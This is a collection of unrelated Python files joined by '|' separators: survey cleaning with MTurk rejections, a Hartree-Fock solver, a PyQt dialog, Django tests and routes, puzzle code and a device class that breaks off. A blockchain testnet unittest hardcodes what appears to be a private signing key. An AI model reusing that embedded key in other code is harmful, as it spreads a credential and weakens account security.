shutil.rmtree(os.path.join(path_to_data, args.surveyId), ignore_errors=True)
if not re.compile('^SV_.*').match(args.surveyId):
print("survey Id must match ^SV_.*")
else:
exportSurvey(apiToken=apiToken, surveyId=args.surveyId, dataCenter='nyu.ca1', fileFormat='csv',
path_to_data=path_to_data)
file_path = \
[file for file in glob(os.path.join(path_to_data, args.surveyId, '*.csv')) if 'labor-market-tweets' in file][0]
# Analyse Results
df = pd.read_csv(file_path, low_memory=False)
# First two rows contain metadata
df.drop([0, 1], inplace=True)
df = df.loc[(df['QIDWorker'].dropna().drop_duplicates().index)].set_index('QIDWorker').copy()
# places = rg.search(
# [tuple(x) for x in df[['LocationLatitude', 'LocationLongitude']].astype(float).dropna().values.tolist()])
print('# of workers who refused the consent form:', (df.QIDConsent.astype(int) == 0).sum())
print('# of workers who did not complete the survey:', (df.Finished.astype(int) == 0).sum())
to_drop = [
'ResponseID',
'ResponseSet',
'IPAddress',
'StartDate',
'EndDate',
'RecipientLastName',
'RecipientFirstName',
'RecipientEmail',
'ExternalDataReference',
'Finished',
'Status',
'Random ID',
'QIDConsent',
'QIDDescription',
'QIDCompletion',
'LocationLatitude',
'LocationLongitude',
'LocationAccuracy']
df.drop(to_drop, 1, inplace=True, errors='ignore')
df.drop([x for x in df.columns if 'BR-FL_' in x], 1, inplace=True, errors='ignore')
print('# Workers:', df.shape[0])
# Checks
checks = df[[col for col in df.columns if 'check' in col]].copy()
checks.columns.name = 'QID'
# Rearrange Results
checks = checks.stack().rename('score').to_frame()
# Extract Check ID
checks['check_id'] = checks.index.get_level_values('QID').map(
lambda x: re.findall('check-(\d)', x)[0])
# Extract Class ID
checks['class_id'] = checks.index.get_level_values('QID').map(
lambda x: re.findall('_(\d)', x)[0])
# Sort Values
checks = checks.reset_index(level='QIDWorker').sort_values(
by=['QIDWorker', 'check_id', 'class_id']).set_index(
['QIDWorker', 'check_id', 'class_id'])
# Bot=Fail to give a Yes to the 2 check questions
def is_bot(x):
l = x.split('_')
if len(l) == 10:
if l[1] == '1' and l[4] == '2' and l[8] == '1' and l[9] == '2':
if l[0] == '1' and l[2] == '2' and l[3] == '2' and l[5] == '2' and l[
6] == '2' and l[7] == '2':
return 3
else:
return 2
elif (l[1] == '1' and l[4] == '2') is not (l[8] == '1' and l[9] == '2'):
return 1
return 0
bots = checks.unstack(
level='check_id').unstack(
level='class_id').fillna('').apply(
lambda x: '_'.join(x), 1).apply(is_bot).where(
lambda x: x == 0).dropna().index
print('# Workers who failed both check questions (= bots?):', bots.shape[0])
print('# Worker ID of workers who failed both check questions (= bots?):', bots)
workers_1_question_right = checks.unstack(
level='check_id').unstack(
level='class_id').fillna('').apply(
lambda x: '_'.join(x), 1).apply(is_bot).where(
lambda x: x == 1).dropna().index
print('# Workers who just passed one check:', workers_1_question_right.shape[0])
workers_2_question_right = checks.unstack(
level='check_id').unstack(
level='class_id').fillna('').apply(
lambda x: '_'.join(x), 1).apply(is_bot).where(
lambda x: x == 2 ).dropna().index
print('# Workers who passed the two check questions:', workers_2_question_right.shape[0])
good_turkers = checks.unstack(
level='check_id').unstack(
level='class_id').fillna('').apply(
lambda x: '_'.join(x), 1).apply(is_bot).where(
lambda x: x == 3).dropna().index
print('# Workers who answered all questions right for the two check blocks:', good_turkers.shape[0])
bots_to_be_discarded = checks.unstack(
level='check_id').unstack(
level='class_id').fillna('').apply(
lambda x: '_'.join(x), 1).apply(is_bot).where(
lambda x: x < args.discard_x).dropna().index
if args.reject_bots == 1:
keys_path = '/scratch/mt4493/twitter_labor/twitter-labor-data/data/keys/mturk'
with open(os.path.join(keys_path, 'access_key_id.txt'), 'r') as f:
access_key_id = f.readline().strip()
with open(os.path.join(keys_path, 'secret_access_key.txt'), 'r') as f:
secret_access_key = f.readline().strip()
requester_feedback_dict = {
'US': f'We are sorry to tell you that you have not passed the quality checks for HIT {args.HITId} (questions on English tweets). Therefore, we must reject your assignment. Thank you for your understanding',
'MX': f'Lamentamos comunicarle que no ha superado los controles de calidad de HIT {args.HITId} (preguntas sobre los tweets en español). Por lo tanto, debemos rechazar su asignación. Gracias por su comprensión.',
'BR': f'Lamentamos dizer que você não passou nos controles de qualidade do HIT {args.HITId} (perguntas sobre tweets portugueses). Portanto, devemos rejeitar sua tarefa. Obrigado por sua compreensão.'
}
mturk = boto3.client('mturk',
aws_access_key_id=access_key_id,
aws_secret_access_key=secret_access_key,
region_name='us-east-1',
endpoint_url='https://mturk-requester.us-east-1.amazonaws.com'
)
# terminate HIT
mturk.update_expiration_for_hit(
HITId=args.HITId,
ExpireAt=0
)
print('HIT was terminated')
assignments_dict = mturk.list_assignments_for_hit(
HITId=args.HITId,
)
assignment_worker_ids_dict = dict()
while 'NextToken' in assignments_dict.keys():
assignment_worker_ids_dict = fill_assignment_worker_ids_dict(assignments_dict=assignments_dict,
assignment_worker_ids_dict=assignment_worker_ids_dict)
assignments_dict = mturk.list_assignments_for_hit(
HITId=args.HITId,
NextToken=assignments_dict['NextToken']
)
if 'NextToken' not in assignments_dict.keys() and assignments_dict['NumResults'] > 0:
assignment_worker_ids_dict = fill_assignment_worker_ids_dict(assignments_dict=assignments_dict,
assignment_worker_ids_dict=assignment_worker_ids_dict)
for bot_id in bots:
try:
mturk.associate_qualification_with_worker(
QualificationTypeId='3RDXJZR9A1H33MQ79TZZWYBXX8WCYD',
WorkerId=bot_id,
IntegerValue=1,
SendNotification=False)
print(f'Assigned bot qualification to bot {bot_id}')
except:
print(f'Failed to assign bot qualification to bot {bot_id}')
if bot_id in assignment_worker_ids_dict.keys():
assignment_id = assignment_worker_ids_dict[bot_id]
try:
mturk.reject_assignment(
AssignmentId=assignment_id,
RequesterFeedback=requester_feedback_dict[args.country_code]
)
except:
print(f'Not able to reject assignment for bot {bot_id} ')
print('Reject assignments for detected bots')
# Remove checks
df.drop([col for col in df.columns if 'check' in col], 1, inplace=True)
df.columns.name = 'QID'
# Rearrange Results
df = df.stack().rename('score').to_frame()
# Extract Tweets ID (Removing Extra Indexing)
df['tweet_id'] = df.index.get_level_values('QID').map(
lambda x: re.sub('-v\d', '', x.replace('ID_', '').replace('.1', '')).split('_')[0])
# Extract Classes (Removing Extra Indexing)
df['class_id'] = df.index.get_level_values('QID').map(
lambda x: re.sub('-v\d', '', x.replace('ID_', '').replace('.1', '')).split('_')[1])
# Sort Values
df = df.reset_index(level='QIDWorker').sort_values(
by=['tweet_id', 'class_id', 'QIDWorker']).set_index(
['tweet_id', 'class_id', 'QIDWorker'])
# Drop users who have failed at least one check
df.drop(bots_to_be_discarded, level='QIDWorker', inplace=True, errors='ignore')
# Convert Scores
df.score = df.score.apply(lambda x: {
'1': 'yes',
'2': 'no',
'3': 'unsure'}[x])
df.to_csv(
os.path.join(path_to_data, args.surveyId, 'labels.csv'))
|
import numpy as np
from integrals import S, T, V, two_electron
def nuc_repulsion(molecule):
"""
Calculate nuclear repulsion between atoms
"""
retval = 0.
for i in range(molecule.N):
for j in range(i+1, molecule.N):
if i == j: continue
atom_i, atom_j = molecule.atoms[i], molecule.atoms[j]
retval += \
atom_i.Z*atom_j.Z/np.linalg.norm(atom_i.coord-atom_j.coord)
return retval
def calc_matrices(basis_set, molecule):
"""
params
basis_set:: list of basis object
molecule:: molecule object
"""
# Number of basis function
N = len(basis_set)
# Initialize matrices
kinetic = np.zeros((N, N))
potential = np.zeros((N, N))
overlap = np.zeros((N, N))
twoe = np.zeros((N, N, N, N))
for i, bi in enumerate(basis_set):
for gi, di in bi.gs:
for j, bj in enumerate(basis_set):
for gj, dj in bj.gs:
kinetic[i,j] += di*dj*T(gi, gj)
overlap[i,j] += di*dj*S(gi, gj)
for z, coord in zip(molecule.Zs, molecule.coords):
potential[i,j] += di*dj*V(gi, gj, z, coord)
for k, bk in enumerate(basis_set):
for gk, dk in bk.gs:
for l, bl in enumerate(basis_set):
for gl, dl in bl.gs:
twoe[i,j,k,l] += \
two_electron(gi, gj, gk, gl) * \
di*dj*dk*dl
return kinetic, potential, overlap, twoe
def calc_error(p_old, p):
"""
Calculate RMSE between p_old and p
"""
return np.linalg.norm(p_old - p)
def orthogonalize(m):
"""
Symmetric orthogonalization of matrix m
"""
_, U = np.linalg.eig(m)
m_diag = np.dot(U.T, np.dot(m, U))
m_diag = np.diag(np.diagonal(m_diag)**-0.5)
X = np.dot(U, np.dot(m_diag, U.T))
return X
def run(basis_set, molecule, thr=1e-10, max_iter=1000):
"""
Run the SCF Iteration
"""
# Print Input Info
print(f"### Molecule Info\n")
print(molecule)
# Number of basis function
N = len(basis_set)
# Calculate matrices
kinetic, potential, overlap, twoe = \
calc_matrices(basis_set, molecule)
H_core = kinetic + potential
X = orthogonalize(overlap)
# Initialize P
P = np.zeros((N, N))
# Initialize error
error = 1e9
# Initialize counter
cnt = 0
# Start iteration
print(f"### Start SCF")
while error > thr:
# Back-up P
P_old = P.copy()
G_ee = np.zeros((N, N))
for i in range(N):
for j in range(N):
for k in range(N):
for l in range(N):
G_ee[i,j] += P[k,l]*(twoe[i,j,l,k]-0.5*twoe[i,k,l,j])
F = H_core + G_ee
# Solving the Roothan equation
# F' = X^TFX
F_prime = np.dot(X.T, np.dot(F, X))
# F'C' = C'e
# Eigenvectors:: C'
# Eigenvalues:: e
eigenvalues, eigenvectors = np.linalg.eig(F_prime)
e = eigenvalues[eigenvalues.argsort()]
C_prime = eigenvectors[:,eigenvalues.argsort()]
# C = XC'
C = np.dot(X, C_prime)
# Calculate new P
for i in range(N):
for j in range(N):
P[i,j] = 2*C[i,0]*C[j,0]
error = calc_error(P_old, P)
# Print log
print(f"### {cnt}th iteration:: error - {error:.6f}")
print(f"### Converged:: {error < thr}")
cnt += 1
assert cnt < max_iter, "### Iteration exceeds MAX counts"
print(f"### SCF Converged!!!")
# Calculate total electronic energy
E = 0.0
for i in range(N):
for j in range(N):
E += 0.5*P[j,i]*(H_core[i,j]+F[i,j])
return P, C, e, E
if __name__ == "__main__":
pass
|
__author__ = "Marc Wang"
__copyright__ = "Copyright (c) 2021 MSAM Lab - University of Waterloo"
__license__ = "BSD-3-Clause"
__maintainer__ = "Marc Wang"
__email__ = "marc.wang@uwaterloo.ca"
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QDialogButtonBox, QDialog, QAbstractButton, QInputDialog, QMessageBox, QComboBox
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot, QObject
from versa3d.settings import SingleEntry, PrintSetting, SettingWrapper
import attr
class SettingsWindow(QDialog):
apply_setting_signal = pyqtSignal()
def __init__(self, slave_cmb: QComboBox,
setting_obj : SettingWrapper,
parent: QObject = None):
super().__init__(parent=parent)
self.setting_obj =setting_obj
init_idx = slave_cmb.currentIndex()
top_left_side = QtWidgets.QHBoxLayout()
new_file_icon = QIcon('designer_files/icon/plus-rectangle.svg')
new_file = QtWidgets.QPushButton(new_file_icon, '')
delete_file_icon = QIcon('designer_files/icon/trash.svg')
delete_file = QtWidgets.QPushButton(delete_file_icon, '')
save_file_icon = QIcon('designer_files/icon/save.svg')
save_file = QtWidgets.QPushButton(save_file_icon, '')
self.drop_down_list = QtWidgets.QComboBox()
new_file.clicked.connect(self.create_new_setting)
delete_file.clicked.connect(self.delete_setting)
save_file.clicked.connect(self.save_setting)
top_left_side.addWidget(new_file)
top_left_side.addWidget(save_file)
top_left_side.addWidget(delete_file)
top_left_side.addWidget(self.drop_down_list)
top_left_side.insertSpacing(-1, 20)
ls_settings = setting_obj.setting
self.stacked_widget = QtWidgets.QStackedWidget()
self.drop_down_list.currentIndexChanged.connect(
self.stacked_widget.setCurrentIndex)
for name, setting_dict in ls_settings.items():
self.drop_down_list.addItem(name)
widget = self.init_tab(setting_dict)
self.stacked_widget.addWidget(widget)
self.drop_down_list.setCurrentIndex(init_idx)
self.drop_down_list.currentIndexChanged.connect(
slave_cmb.setCurrentIndex)
layout = QtWidgets.QVBoxLayout()
layout.addLayout(top_left_side)
layout.addWidget(self.stacked_widget)
self.button_dialog = QDialogButtonBox(Qt.Horizontal)
self.button_dialog.addButton(QDialogButtonBox.Apply)
self.button_dialog.addButton(QDialogButtonBox.Ok)
self.button_dialog.addButton(QDialogButtonBox.Cancel)
self.button_dialog.clicked.connect(self.button_clicked)
layout.addWidget(self.button_dialog)
self.setLayout(layout)
@pyqtSlot()
def create_new_setting(self) -> None:
new_name, ok = QInputDialog.getText(
self, 'New Setting', 'Enter new name:')
idx = self.drop_down_list.currentIndex()
is_duplicate = self.drop_down_list.findText(new_name) != -1
if len(new_name) != 0 and ok and not is_duplicate:
setting_dict = self.setting_obj.clone(idx, new_name)
self.drop_down_list.addItem(new_name)
widget = self.init_tab(setting_dict)
self.stacked_widget.addWidget(widget)
self.drop_down_list.setCurrentIndex(
self.drop_down_list.count() - 1)
elif len(new_name) == 0:
msg_box = QMessageBox(self)
msg_box.setText("Empty string, please specify name :")
msg_box.exec()
elif is_duplicate:
msg_box = QMessageBox(self)
msg_box.setText("Deplicate string, please specify another name :")
msg_box.exec()
@pyqtSlot()
def save_setting(self) -> None:
setting_idx = self.drop_down_list.currentIndex()
self.setting_obj.save(setting_idx)
@pyqtSlot()
def delete_setting(self) -> None:
setting_idx = self.drop_down_list.currentIndex()
self.setting_obj.remove(setting_idx)
self.drop_down_list.removeItem(setting_idx)
widget = self.stacked_widget.widget(setting_idx)
self.stacked_widget.removeWidget(widget)
@pyqtSlot(QAbstractButton)
def button_clicked(self, button: QAbstractButton) -> None:
role = self.button_dialog.buttonRole(button)
if role == QDialogButtonBox.ApplyRole:
self.apply_setting_signal.emit()
elif role == QDialogButtonBox.AcceptRole:
self.apply_setting_signal.emit()
self.accept()
elif role == QDialogButtonBox.RejectRole:
self.reject()
def init_tab(self, setting_dict: PrintSetting) -> QtWidgets.QWidget:
layout = QtWidgets.QHBoxLayout()
menu_widget = QtWidgets.QListWidget()
layout.addWidget(menu_widget)
sub_stacked_page = QtWidgets.QStackedWidget()
menu_widget.currentRowChanged.connect(sub_stacked_page.setCurrentIndex)
layout.addWidget(sub_stacked_page)
cat_frame = {}
sec_frame = {}
for entry in attr.asdict(setting_dict, recurse=False).values():
if isinstance(entry, SingleEntry):
cat = entry.ui['category']
if not cat in cat_frame.keys():
single_frame = QtWidgets.QWidget()
single_frame.setLayout(QtWidgets.QVBoxLayout())
cat_frame[cat] = single_frame
menu_widget.addItem(cat)
sec_frame[cat] = {}
sub_stacked_page.addWidget(single_frame)
sec = entry.ui['section']
if not sec in sec_frame[cat].keys():
box_layout = QtWidgets.QVBoxLayout()
qbox = QtWidgets.QGroupBox(sec)
qbox.setLayout(box_layout)
sec_frame[cat][sec] = qbox
cat_frame[cat].layout().addWidget(qbox)
q_entry = entry.create_ui_entry()
self.apply_setting_signal.connect(entry.commit_value)
sec_frame[cat][sec].layout().addWidget(q_entry)
widget = QtWidgets.QWidget()
widget.setLayout(layout)
return widget
|
#!/usr/bin/python3
import unittest
import time
import json
from deployutils.testnet import *
import deployutils.eehelper as ee
techKey ='5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD3'
class EETestCase(unittest.TestCase):
def setUp(self):
self.eeHelper = ee.EEHelper(self)
def tearDown(self):
self.eeHelper.tearDown()
def test_userSendTransaction(self):
actor = 'tech'
result = pushAction('cyber', 'checkwin', actor, [], keys=techKey)
print("Pushed transaction with %s" % result['transaction_id'])
self.assertEqual(result['processed']['receipt']['status'], 'executed')
trx_id = result['transaction_id']
block_num = result['processed']['block_num']
actionData = {
"account": "cyber",
"name": "checkwin",
"authorization": [{"actor": actor, "permission": "active"}],
"data": {},
}
actionTrx = {'actions':ee.AllItems(actionData)}
actionTrace = {
"receiver": "cyber",
"code": "cyber",
"action": "checkwin",
"auth": [{"actor": "tech", "permission": "active"}],
"args": {},
"events": []
}
self.eeHelper.waitEvents(
[ ({'msg_type':'AcceptTrx', 'id':trx_id}, {'accepted':True, 'implicit':False, 'scheduled':False, 'trx':actionTrx}),
({'msg_type':'ApplyTrx', 'id':trx_id}, {'block_num':block_num, 'actions':ee.AllItems(actionTrace), 'except':ee.Missing()}),
({'msg_type':'AcceptBlock', 'block_num':block_num}, {'trxs':ee.Unorder({'id':trx_id, 'status':'executed'})})
], block_num)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from hwtBuildsystem.vivado.executor import VivadoExecutor
from hwtBuildsystem.vivado.part import XilinxPart
def importSampleBdProject(v: VivadoExecutor, part: str, tmpDir: str):
p = v.project(tmpDir, "SampleBdProject")
if p._exists():
p._remove()
p.create()
p.setPart(part)
bd = p.boardDesign("test1")
bd.importFromTcl(tmpDir + 'test1.tcl', refrestTclIfExists=False)
if __name__ == "__main__":
tmpDir = 'tmp/'
pb = XilinxPart
part = XilinxPart(pb.Family.kintex7, pb.Size._160t, pb.Package.ffg676, pb.Speedgrade._2)
with VivadoExecutor(logComunication=True) as v:
importSampleBdProject(v, part, tmpDir)
v.openGui()
|
import os
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from app.core.config import settings
if os.environ.get("DEPLOY_ENV") == "TEST":
engine = create_engine("sqlite:///test.db", pool_pre_ping=True)
else:
engine = create_engine(settings.SQLALCHEMY_DATABASE_URI, pool_pre_ping=True)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
|
import subprocess
from mock import patch
from django.test import TestCase
from django.core.management.base import CommandError
from django.conf import settings
from django.utils import six
from dbbackup.management.commands.dbrestore import Command as DbrestoreCommand
from dbbackup.dbcommands import DBCommands
from dbbackup.tests.utils import FakeStorage, ENCRYPTED_FILE, TEST_DATABASE
from dbbackup.tests.utils import GPG_PRIVATE_PATH, DEV_NULL, COMPRESSED_FILE
@patch('dbbackup.management.commands.dbrestore.input', return_value='y')
class DbrestoreCommandRestoreBackupTest(TestCase):
def setUp(self):
self.command = DbrestoreCommand()
self.command.stdout = DEV_NULL
self.command.uncompress = False
self.command.decrypt = False
self.command.backup_extension = 'bak'
self.command.filepath = 'foofile'
self.command.database = TEST_DATABASE
self.command.dbcommands = DBCommands(TEST_DATABASE)
self.command.passphrase = None
self.command.storage = FakeStorage()
def test_no_filepath(self, *args):
self.command.storage.list_files = ['foo.bak']
self.command.filepath = None
self.command.restore_backup()
def test_no_backup_found(self, *args):
self.command.filepath = None
with self.assertRaises(CommandError):
self.command.restore_backup()
def test_uncompress(self, *args):
self.command.storage.file_read = COMPRESSED_FILE
self.command.filepath = COMPRESSED_FILE
self.command.uncompress = True
self.command.restore_backup()
@patch('dbbackup.management.commands.dbrestore.getpass', return_value=None)
def test_decrypt(self, *args):
if six.PY3:
self.skipTest("Decryption isn't implemented in Python3")
cmd = ('gpg --import %s' % GPG_PRIVATE_PATH).split()
subprocess.call(cmd, stdout=DEV_NULL, stderr=DEV_NULL)
self.command.decrypt = True
self.command.restore_backup()
class DbrestoreCommandGetDatabaseTest(TestCase):
def setUp(self):
self.command = DbrestoreCommand()
def test_give_db_name(self):
db = self.command._get_database({'database': 'default'})
self.assertEqual(db, settings.DATABASES['default'])
def test_no_given_db(self):
db = self.command._get_database({})
self.assertEqual(db, settings.DATABASES['default'])
@patch('django.conf.settings.DATABASES', {'db1': {}, 'db2': {}})
def test_no_given_db_multidb(self):
with self.assertRaises(CommandError):
self.command._get_database({})
class DbrestoreCommandGetExtensionTest(TestCase):
def setUp(self):
self.command = DbrestoreCommand()
def test_tar(self):
ext = self.command.get_extension('foo.tar')
self.assertEqual(ext, '.tar')
def test_tar_gz(self):
ext = self.command.get_extension('foo.tar.gz')
self.assertEqual(ext, '.gz')
def test_no_extension(self):
ext = self.command.get_extension('foo')
self.assertEqual(ext, '')
class DbrestoreCommandUncompressTest(TestCase):
def setUp(self):
self.command = DbrestoreCommand()
def test_uncompress(self):
inputfile = open(COMPRESSED_FILE, 'rb')
fd = self.command.uncompress_file(inputfile)
fd.seek(0)
self.assertEqual(fd.read(), b'foo\n')
class DbrestoreCommandDecryptTest(TestCase):
def setUp(self):
self.command = DbrestoreCommand()
self.command.passphrase = None
cmd = ('gpg --import %s' % GPG_PRIVATE_PATH).split()
subprocess.call(cmd, stdout=DEV_NULL, stderr=DEV_NULL)
@patch('dbbackup.management.commands.dbrestore.input', return_value=None)
@patch('dbbackup.management.commands.dbrestore.getpass', return_value=None)
def test_decrypt(self, *args):
if six.PY3:
self.skipTest("Decryption isn't implemented in Python3")
inputfile = open(ENCRYPTED_FILE, 'r+b')
uncryptfile = self.command.unencrypt_file(inputfile)
uncryptfile.seek(0)
self.assertEqual('foo\n', uncryptfile.read())
|
from django.contrib import admin
from django.urls import path
from django.contrib.auth import views as auth_views
from django.urls import reverse_lazy
from . import views
app_name = "players"
urlpatterns = [
path('', views.home, name = 'home'),
path('users/', views.users_list, name = 'users'),
path('test/', views.test, name = 'testing'),
path('scoreboard/', views.scoreboard, name = 'scoreboard'),
path('registration/', views.register, name = 'registration'),
path('challenges/', views.challenges, name = 'challenges'),
path('login/', views.login_page, name = 'l'),
path('logout/', views.logout_request, name = 'loggedout'),
path('profile/', views.profile, name = 'profile'),
path('dashboard/', views.author_dashboard, name = 'dash'),
path('add_challenges/', views.challenge_form, name = 'add'),
path('edit_challenges/<int:c_id>/', views.challenge_edit, name = 'edit'),
path('delete_challenges/<int:c_id>/', views.challenge_delete, name = 'delete'),
path('send_notification/', views.sending_notification, name='notification'),
path('notifications/', views.view_notification, name='v_notification'),
path('rules/', views.rules, name='rules'),
path('update_rules/<int:id>', views.update_rules, name='update_rules'),
path('individual_score/<int:p_id>/', views.individual_player_score, name='i_score'),
path('password_reset/done/', auth_views.PasswordResetDoneView.as_view(template_name='players/password/password_reset_done.html'), name='password_reset_done'),
path('reset/<uidb64>/<token>/', auth_views.PasswordResetConfirmView.as_view(template_name="players/password/password_reset_confirm.html",success_url="/reset/done/"), name='password_reset_confirm'),
path('reset/done/', auth_views.PasswordResetCompleteView.as_view(template_name='players/password/password_reset_complete.html'), name='password_reset_complete'),
]
|
# from Utility import Utility as utility
import pandas as pd
class Imbalanced:
def __init__(self, data):
self.data = data
def DivideAndConquer(self, target, minority_class, majority_class, n=5000):
total = len(self.data)
minority = self.data[self.data[target] == minority_class]
majority = self.data[self.data[target] == majority_class]
majoritysampling = majority.sample(n=len(majority), random_state=10)
new_majority_len = ((len(majority) - len(minority)) / total) * n
iterations = len(majority) / new_majority_len
pickrange = list(range(int(new_majority_len), len(majority), int(new_majority_len)))
print(len(pickrange))
iterable = [0]
datatable = []
for IndexValue in range(int(iterations)):
newMajority = majoritysampling[iterable[-1]:pickrange[IndexValue]]
new_data = pd.concat([newMajority, minority], ignore_index=True)
datatable.append(new_data)
iterable.append(pickrange[IndexValue])
# utility.update_progress(1,IndexValue, int(iterations) - 1)
return datatable
|
#################################################################
# test.py
# Author : %AUTHOR%
# Version : 1.0
# Date : %DATE%
# Description: Test Script
#################################################################
|
from .feature_params import FeatureParams
from .split_params import SplittingParams
from .train_params import TrainingParams
from .train_pipeline_params import (
read_training_pipeline_params,
TrainingPipelineParamsSchema,
TrainingPipelineParams,
)
from .model_params import (
read_model_logistic_regression_params,
read_model_decision_tree_classifier_params,
)
__all__ = [
"FeatureParams",
"SplittingParams",
"TrainingPipelineParams",
"TrainingPipelineParamsSchema",
"TrainingParams",
"read_training_pipeline_params",
"read_model_logistic_regression_params",
"read_model_decision_tree_classifier_params"
]
|
#
# Pybalone
#
# A Python implementation of the Abalone* board game
# Abalone is a registered trademark of Abalone S.A.
#
# github.com/marnovo
#
x = 9 # invalid spaces
b = 0 # empty board spaces
A = 1 # player 1/A/top
B = 2 # player 2/B/bottom
# Axial coordinates used as explained in:
# http://www.redblobgames.com/grids/hexagons/#coordinates-axial
# Stored as explained in:
# http://www.redblobgames.com/grids/hexagons/#map-storage
# Fix below with above
BOARD_ZERO = [
[ x, x, 0, 0, 0, 0, 0, x, x],
[x, x, 0, 0, 0, 0, 0, 0, x ],
[ x, 0, 0, 0, 0, 0, 0, 0, x],
[x, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[x, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ x, 0, 0, 0, 0, 0, 0, 0, x],
[x, x, 0, 0, 0, 0, 0, 0, x ],
[ x, x, 0, 0, 0, 0, 0, x, x],
]
BOARD_INIT = [
[ x, x, 1, 1, 1, 1, 1, x, x],
[x, x, 1, 1, 1, 1, 1, 1, x ],
[ x, 0, 0, 1, 1, 1, 0, 0, x],
[x, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[x, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ x, 0, 0, 2, 2, 2, 0, 0, x],
[x, x, 2, 2, 2, 2, 2, 2, x ],
[ x, x, 2, 2, 2, 2, 2, x, x],
]
board = BOARD_INIT
|
"""title
https://adventofcode.com/2021/day/19
"""
import numpy as np
import pandas as pd
import itertools
import re
SMALL_INPUT = open('small_input.txt').read()
ORIENTATIONS = """
x, y, z
x, z,-y
x,-y,-z
x,-z, y
y,-x, z
y, z, x
y, x,-z
y,-z,-x
z, y,-x
z,-x,-y
z,-y, x
z, x, y
-x, y,-z
-x, z, y
-x,-y, z
-x,-z,-y
-y,-x,-z
-y, z,-x
-y, x, z
-y,-z, x
-z, y, x
-z,-x, y
-z,-y,-x
-z, x,-y
"""
ORIENTATIONS = re.findall(r'(.)(.),(.)(.),(.)(.)', ORIENTATIONS)
def parse(data):
result = {}
scanners = data.strip().split('\n\n')
for i, s in enumerate(scanners):
coords = []
for row in re.findall(r'(-?\d+),(-?\d+),(-?\d+)', s):
coords.append(list(map(int, row)))
coords.sort()
a = np.array(coords)
result[i] = a
return result
def get_axis(a, sign, axis):
axis_index = 'xyz'.find(axis)
sign = -1 if sign == '-' else 1
return sign * a[:, axis_index]
def get_orientations(scanner):
for xsig, xax, ysig, yax, zsig, zax in ORIENTATIONS:
b = np.zeros(scanner.shape, scanner.dtype)
b[:, 0] = get_axis(scanner, xsig, xax)
b[:, 1] = get_axis(scanner, ysig, yax)
b[:, 2] = get_axis(scanner, zsig, zax)
yield b
def match(s1, s2):
for origin1 in s1[-10:]: # one of these has to match because they are sorted
for origin2 in s2:
translation = origin2 - origin1
s2_trans = s2 - translation
merged = np.vstack([s1, s2_trans])
uni = np.unique(merged, axis=0)
overlap = merged.shape[0] - uni.shape[0]
if overlap >= 12:
s2_trans = pd.DataFrame(s2_trans).sort_values(by=0).values
return translation, s2_trans
return None, None
def match_pair(s1, s2):
for s2 in get_orientations(s2):
r, s = match(s1, s2)
if r is not None:
return r, s
return None, None
def solve(data):
scanners = parse(data)
aligned = [0]
vectors = [(0, 0, 0)]
checked = set()
while len(aligned) < len(scanners):
print(f'{len(aligned)} / {len(scanners)} scanners matched')
merge_found = False
for s1, s2 in itertools.product(aligned, scanners):
if (s1, s2) in checked or s2 in aligned:
continue
checked.add((s1, s2))
print(f'comparing {s1} vs {s2}')
vec, s2_trans = match_pair(scanners[s1], scanners[s2])
if vec is not None:
aligned.append(s2)
vectors.append(vec)
scanners[s2] = s2_trans
print('match found!\n')
merge_found = True
break
if not merge_found:
raise Exception("something went wrong")
df = pd.DataFrame(scanners[0])
a = np.vstack(list(scanners.values()))
a = np.unique(a, axis=0)
df = pd.DataFrame(a)
df.sort_values(by=0, ascending=True).to_csv('out.csv', index=False)
v = pd.DataFrame(vectors)
v.to_csv('vectors.csv', index=False)
return df.shape[0]
def solve2(fn):
df = pd.read_csv(fn)
largest = 0
for _, r1 in df.iterrows():
for _, r2 in df.iterrows():
manhattan = np.abs(r1.values - r2.values).sum()
if manhattan > largest:
largest = manhattan
return largest
if __name__ == '__main__':
input_data = open('input_data.txt').read()
#result = solve(SMALL_INPUT)
result = solve(input_data)
print(f'Example 1: {result}')
# 355
result = solve2('vectors_small.csv')
result = solve2('vectors.csv')
print(f'Example 2: {result}')
# 10842
|
from setuptools import setup
setup(
name='genshinstats',
version='1.3.8.2',
author='thesadru',
packages=['genshinstats'],
description="A python library that can get the stats of your or others' Genshin Impact account using Mihoyo's API.",
keywords='wrapper-api genshin'.split(),
python_requires='>=3.6',
url='https://github.com/thesadru/genshinstats',
install_requires=['requests'],
author_email='thesadru@gmail.com',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
) |
from time import sleep
import utils.show as show
import utils.file as file
def list():
info = 'People Registered'
fileExists = file.exists()
if fileExists is True:
show.header(info)
file.read()
sleep(2)
def register(name: str, age: int):
file.write(f'{name},{age}')
sleep(2)
|
from .base_device import BaseDevice
import uuid
class Mower(BaseDevice):
def __init__(self, smart_system, device_map):
"""Constructor for the mower device."""
BaseDevice.__init__(self, smart_system, device_map["COMMON"][0]["id"])
self.type = "MOWER"
self.activity = "N/A"
self.operating_hours = "N/A"
self.state = "N/A"
self.last_error_code = "N/A"
self.mower_id = None
self.setup_values_from_device_map(device_map)
def update_device_specific_data(self, device_map):
# Mower has only one item
if device_map["type"] == "MOWER":
self.mower_id = device_map["id"]
self.set_attribute_value("activity", device_map, "activity")
self.set_attribute_value("operating_hours", device_map, "operatingHours")
self.set_attribute_value("state", device_map, "state")
self.set_attribute_value("last_error_code", device_map, "lastErrorCode")
def start_seconds_to_override(self, duration):
if self.mower_id is not None:
data = {
"id": str(uuid.uuid1()),
"type": "MOWER_CONTROL",
"attributes": {"command": "START_SECONDS_TO_OVERRIDE", "seconds": duration},
}
self.smart_system.call_smart_system_service(self.mower_id, data)
else:
self.smart_system.logger.error("The mower id is not defined")
def start_dont_override(self, duration):
if self.mower_id is not None:
data = {
"id": str(uuid.uuid1()),
"type": "MOWER_CONTROL",
